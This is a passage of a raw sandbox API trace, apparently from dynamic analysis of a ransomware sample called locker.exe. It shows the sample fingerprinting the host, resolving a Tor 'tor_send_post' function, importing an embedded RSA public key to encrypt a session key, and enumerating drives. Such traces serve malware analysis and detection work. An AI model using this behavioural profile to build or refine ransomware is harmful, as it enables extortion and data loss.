0x402ee0 [0112.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b3a0, cbMultiByte=-1, lpWideCharStr=0x402ee0, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0112.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcfa7c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530 [0112.502] GetFileType (hFile=0x530) returned 0x1 [0112.503] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x402ee0 | out: hHeap=0x3c0000) returned 1 [0112.503] GetLastError () returned 0x0 [0112.503] SetLastError (dwErrCode=0x0) [0112.503] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x439018 [0112.503] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf574 | out: lpNewFilePointer=0x0) returned 1 [0112.503] GetLastError () returned 0x0 [0112.503] SetLastError (dwErrCode=0x0) [0112.504] GetLastError () returned 0x0 [0112.504] SetLastError (dwErrCode=0x0) [0112.504] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcfa6c | out: lpNewFilePointer=0x0) returned 1 [0112.504] WriteFile (in: hFile=0x530, lpBuffer=0x439018*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0xdcfad0, lpOverlapped=0x0 | out: lpBuffer=0x439018*, lpNumberOfBytesWritten=0xdcfad0*=0x43, lpOverlapped=0x0) returned 1 [0112.505] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x439018 | out: hHeap=0x3c0000) returned 1 [0112.506] CloseHandle (hObject=0x530) returned 1 [0113.019] GetLastError () returned 0x0 [0113.019] SetLastError (dwErrCode=0x0) [0113.019] GetLastError () returned 0x0 [0113.019] SetLastError (dwErrCode=0x0) [0113.019] GetLastError () returned 0x0 [0113.019] SetLastError (dwErrCode=0x0) [0113.019] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3ea330 [0113.019] GetLastError () returned 0x0 [0113.019] SetLastError (dwErrCode=0x0) [0113.019] GetLastError () returned 0x0 [0113.020] SetLastError (dwErrCode=0x0) [0113.020] GetLastError () returned 0x0 [0113.020] SetLastError (dwErrCode=0x0) [0113.020] GetLastError () returned 0x0 [0113.020] SetLastError (dwErrCode=0x0) [0113.020] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b3a0 | out: hHeap=0x3c0000) returned 1 [0113.020] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436e08 [0113.020] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b480 [0113.020] GetComputerNameA (in: lpBuffer=0xdcfa78, nSize=0xdcfb78 | out: lpBuffer="NQDPDE", nSize=0xdcfb78) returned 1 [0113.020] GetVolumeInformationA (in: lpRootPathName="C://", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xdcfb74, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xdcfb74*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0113.021] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407128 [0113.021] GetLastError () returned 0xcb [0113.021] SetLastError (dwErrCode=0xcb) [0113.021] GetLastError () returned 0xcb [0113.021] SetLastError (dwErrCode=0xcb) [0113.021] GetLastError () returned 0xcb [0113.021] SetLastError (dwErrCode=0xcb) [0113.021] GetLastError () returned 0xcb [0113.021] SetLastError (dwErrCode=0xcb) [0113.021] GetLastError () returned 0xcb [0113.021] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.022] SetLastError (dwErrCode=0xcb) [0113.022] GetLastError () returned 0xcb [0113.023] SetLastError (dwErrCode=0xcb) [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0113.023] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407128 | out: hHeap=0x3c0000) returned 1 [0113.023] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0113.023] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0113.023] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b480 | out: hHeap=0x3c0000) returned 1 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4371f8 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ee0 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437240 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436f28 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b3d8 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407128 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x406de0 [0113.023] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407128 | out: hHeap=0x3c0000) returned 1 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407128 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b608 [0113.023] AreFileApisANSI () returned 1 [0113.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0113.023] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x403020 [0113.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x403020, cchWideChar=36 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll") returned 36 [0113.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\tor-lib.dll"), fInfoLevelId=0x0, lpFileInformation=0xdcfadc | out: lpFileInformation=0xdcfadc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f63dc30, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x2f63dc30, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x2f663f72, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x9800)) returned 1 [0113.024] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403020 | out: hHeap=0x3c0000) returned 1 [0113.024] GetProcAddress (hModule=0x74190000, lpProcName="tor_send_post") returned 0x74191e72 [0113.024] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b8a8 [0113.024] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0113.024] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x40ee30 [0113.024] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x3353c1, phModule=0x40ee3c | out: phModule=0x40ee3c*=0x320000) returned 1 [0113.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a19, lpParameter=0x40ee30, dwCreationFlags=0x4, lpThreadId=0xdcfb20 | out: lpThreadId=0xdcfb20*=0xbd8) returned 0x4b0 [0113.026] ResumeThread (hThread=0x4b0) returned 0x1 [0113.026] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0xea60) returned 0x0 [0152.672] TerminateThread (hThread=0x4b0, dwExitCode=0x0) returned 0 [0152.672] CloseHandle (hObject=0x4b0) returned 0 [0152.672] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x120) returned 0x402228 [0152.672] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b608 | out: hHeap=0x3c0000) returned 1 [0152.672] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407128 | out: hHeap=0x3c0000) returned 1 [0152.673] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x406de0 | out: hHeap=0x3c0000) returned 1 [0152.673] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b3d8 | out: hHeap=0x3c0000) returned 1 [0152.673] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437168 | out: hHeap=0x3c0000) returned 1 [0152.673] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436f28 | out: hHeap=0x3c0000) returned 1 [0152.673] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437240 | out: hHeap=0x3c0000) returned 1 [0152.673] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x112) returned 0x423e38 [0152.673] GetLocalTime (in: lpSystemTime=0xdcfc18 | out: lpSystemTime=0xdcfc18*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x35, wSecond=0x27, wMilliseconds=0x18b)) [0152.673] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfabc, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0152.673] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0152.673] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfaa8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0152.673] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b838 [0152.674] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0152.674] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b838 | out: hHeap=0x3c0000) returned 1 [0152.674] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0152.674] AreFileApisANSI () returned 1 [0152.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b7c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0152.674] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x403c50 [0152.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b7c8, cbMultiByte=-1, lpWideCharStr=0x403c50, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0152.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcfa80, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0152.675] GetFileType (hFile=0x550) returned 0x1 [0152.675] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403c50 | out: hHeap=0x3c0000) returned 1 [0152.675] GetLastError () returned 0xb7 [0152.675] SetLastError (dwErrCode=0xb7) [0152.675] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3fa038 [0152.676] SetFilePointerEx (in: hFile=0x550, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf578 | out: lpNewFilePointer=0x0) returned 1 [0152.676] GetLastError () returned 0xb7 [0152.676] SetLastError (dwErrCode=0xb7) [0152.676] GetLastError () returned 0xb7 [0152.676] SetLastError (dwErrCode=0xb7) [0152.677] SetFilePointerEx (in: hFile=0x550, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcfa70 | out: lpNewFilePointer=0x0) returned 1 [0152.677] WriteFile (in: hFile=0x550, lpBuffer=0x3fa038*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0xdcfad4, lpOverlapped=0x0 | out: lpBuffer=0x3fa038*, lpNumberOfBytesWritten=0xdcfad4*=0x48, lpOverlapped=0x0) returned 1 [0152.677] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3fa038 | out: hHeap=0x3c0000) returned 1 [0152.677] CloseHandle (hObject=0x550) returned 1 [0152.748] GetLastError () returned 0xb7 [0152.748] SetLastError (dwErrCode=0xb7) [0152.748] GetLastError () returned 0xb7 [0152.748] SetLastError (dwErrCode=0xb7) [0152.748] GetLastError () returned 0xb7 [0152.748] SetLastError (dwErrCode=0xb7) [0152.748] GetLastError () returned 0xb7 [0152.749] SetLastError (dwErrCode=0xb7) [0152.749] GetLastError () returned 0xb7 [0152.749] SetLastError (dwErrCode=0xb7) [0152.749] GetLastError () returned 0xb7 [0152.749] SetLastError (dwErrCode=0xb7) [0152.749] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0152.749] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ee0 | out: hHeap=0x3c0000) returned 1 [0152.749] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4371f8 | out: hHeap=0x3c0000) returned 1 [0152.749] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x120) returned 0x3ec3b8 [0152.749] CryptAcquireContextA (in: phProv=0xdcfc04, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdcfc04*=0x40aa20) returned 1 [0153.680] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1NGSiwZi9DZnKCM4edVF4+8QF\nWfPOkmnOLHJ1nlGUvLFNkx8QDiofgA9AHNAkDNUKTeJq1e0fWvJ8Tf8jGA17Iz8t\nEb6rFF8gIdtM6C3SMJz72oAeJHCzd4JgBD7V0EKF/bIDk+uoxmC0VZYjRmoN+BhI\nGSz8MfHHbUBlhBBsoQIDAQAB\n-----END PUBLIC KEY-----", cchString=0x112, dwFlags=0x0, pbBinary=0x0, pcbBinary=0xdcfbc4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0xdcfbc4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0153.680] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa2) returned 0x42d178 [0153.680] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1NGSiwZi9DZnKCM4edVF4+8QF\nWfPOkmnOLHJ1nlGUvLFNkx8QDiofgA9AHNAkDNUKTeJq1e0fWvJ8Tf8jGA17Iz8t\nEb6rFF8gIdtM6C3SMJz72oAeJHCzd4JgBD7V0EKF/bIDk+uoxmC0VZYjRmoN+BhI\nGSz8MfHHbUBlhBBsoQIDAQAB\n-----END PUBLIC KEY-----", cchString=0x112, dwFlags=0x0, pbBinary=0x42d178, pcbBinary=0xdcfbc4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42d178, pcbBinary=0xdcfbc4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0153.680] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42d178, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0xdcfbec, pcbStructInfo=0xdcfbe4 | out: pvStructInfo=0xdcfbec, pcbStructInfo=0xdcfbe4) returned 1 [0153.753] CryptImportPublicKeyInfo (in: hCryptProv=0x40aa20, dwCertEncodingType=0x1, pInfo=0x3fec28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3fec58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3fec60*, PublicKey.cUnusedBits=0x0), phKey=0xdcfc38 | out: phKey=0xdcfc38*=0x3e1058) returned 1 [0153.775] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0xdcfbf8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0xdcfbf8*=0x80) returned 1 [0153.776] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42d178 | out: hHeap=0x3c0000) returned 1 [0153.776] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40b108 [0153.776] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40b108*, pdwDataLen=0xdcfbf0*=0x20, dwBufLen=0x80 | out: pbData=0x40b108*, pdwDataLen=0xdcfbf0*=0x80) returned 1 [0153.776] CryptDestroyKey (hKey=0x3e1058) returned 1 [0153.776] CryptReleaseContext (hProv=0x40aa20, dwFlags=0x0) returned 1 [0153.776] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec3b8 | out: hHeap=0x3c0000) returned 1 [0153.776] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436e98 [0153.776] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ce8 [0153.776] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0153.777] GetComputerNameA (in: lpBuffer=0xdcfa78, nSize=0xdcfb78 | out: lpBuffer="NQDPDE", nSize=0xdcfb78) returned 1 [0153.777] GetVolumeInformationA (in: lpRootPathName="C://", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xdcfb74, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xdcfb74*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.777] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0153.777] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0153.777] GetLastError () returned 0xcb [0153.777] SetLastError (dwErrCode=0xcb) [0153.777] GetLastError () returned 0xcb [0153.777] SetLastError (dwErrCode=0xcb) [0153.777] GetLastError () returned 0xcb [0153.777] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.778] SetLastError (dwErrCode=0xcb) [0153.778] GetLastError () returned 0xcb [0153.779] SetLastError (dwErrCode=0xcb) [0153.779] GetLastError () returned 0xcb [0153.779] SetLastError (dwErrCode=0xcb) [0153.779] GetLastError () returned 0xcb [0153.779] SetLastError (dwErrCode=0xcb) [0153.802] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b838 [0153.802] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0153.802] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b838 | out: hHeap=0x3c0000) returned 1 [0153.802] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0153.802] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0153.802] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436f28 [0153.802] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419a78 [0153.803] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d18 [0153.803] GetLogicalDriveStringsA (in: nBufferLength=0x400, lpBuffer=0xdcf734 | out: lpBuffer="C:\\") returned 0x8 [0153.803] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0153.803] GetDiskFreeSpaceExA (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0xdcfc08, lpTotalNumberOfFreeBytes=0xdcfc00 | out: lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0xdcfc08, lpTotalNumberOfFreeBytes=0xdcfc00) returned 1 [0153.803] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c88 [0153.804] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d48 [0153.804] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c58 [0153.804] GetLastError () returned 0xcb [0153.804] SetLastError (dwErrCode=0xcb) [0153.804] GetLastError () returned 0xcb [0153.804] SetLastError (dwErrCode=0xcb) [0153.804] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3f8d78 [0153.804] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.804] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.804] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e6590 | out: hHeap=0x3c0000) returned 1 [0153.804] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cf9b0 | out: hHeap=0x3c0000) returned 1 [0153.804] GetLastError () returned 0xcb [0153.804] SetLastError (dwErrCode=0xcb) [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419cd8 [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x419c78 [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x419d28 [0153.805] GetLastError () returned 0xcb [0153.805] SetLastError (dwErrCode=0xcb) [0153.805] GetLastError () returned 0xcb [0153.805] SetLastError (dwErrCode=0xcb) [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0153.805] GetLastError () returned 0xcb [0153.805] SetLastError (dwErrCode=0xcb) [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.805] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.805] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419cd8 | out: hHeap=0x3c0000) returned 1 [0153.805] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f8d78 | out: hHeap=0x3c0000) returned 1 [0153.805] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d28 | out: hHeap=0x3c0000) returned 1 [0153.805] GetLastError () returned 0xcb [0153.805] SetLastError (dwErrCode=0xcb) [0153.805] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419c98 [0153.806] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x419ca8 [0153.806] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x419d28 [0153.806] GetLastError () returned 0xcb [0153.806] SetLastError (dwErrCode=0xcb) [0153.806] GetLastError () returned 0xcb [0153.806] SetLastError (dwErrCode=0xcb) [0153.806] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3f8d78 [0153.806] GetLastError () returned 0xcb [0153.806] SetLastError (dwErrCode=0xcb) [0153.806] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c98 | out: hHeap=0x3c0000) returned 1 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cf9b0 | out: hHeap=0x3c0000) returned 1 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d28 | out: hHeap=0x3c0000) returned 1 [0153.806] GetLastError () returned 0xcb [0153.806] SetLastError (dwErrCode=0xcb) [0153.806] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419d58 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ca8 | out: hHeap=0x3c0000) returned 1 [0153.806] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c78 | out: hHeap=0x3c0000) returned 1 [0153.807] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419cc8 [0153.807] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437168 [0153.807] GetLastError () returned 0xcb [0153.807] SetLastError (dwErrCode=0xcb) [0153.807] GetLastError () returned 0xcb [0153.807] SetLastError (dwErrCode=0xcb) [0153.807] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438938 [0153.807] GetLastError () returned 0xcb [0153.807] SetLastError (dwErrCode=0xcb) [0153.807] GetLastError () returned 0xcb [0153.807] SetLastError (dwErrCode=0xcb) [0153.807] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0153.807] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x415280 [0153.807] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x415280 | out: hHeap=0x3c0000) returned 1 [0153.807] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d58 | out: hHeap=0x3c0000) returned 1 [0153.808] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f8d78 | out: hHeap=0x3c0000) returned 1 [0153.808] GetLastError () returned 0xcb [0153.808] SetLastError (dwErrCode=0xcb) [0153.808] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x419d98 [0153.808] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x419c48 [0153.808] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, 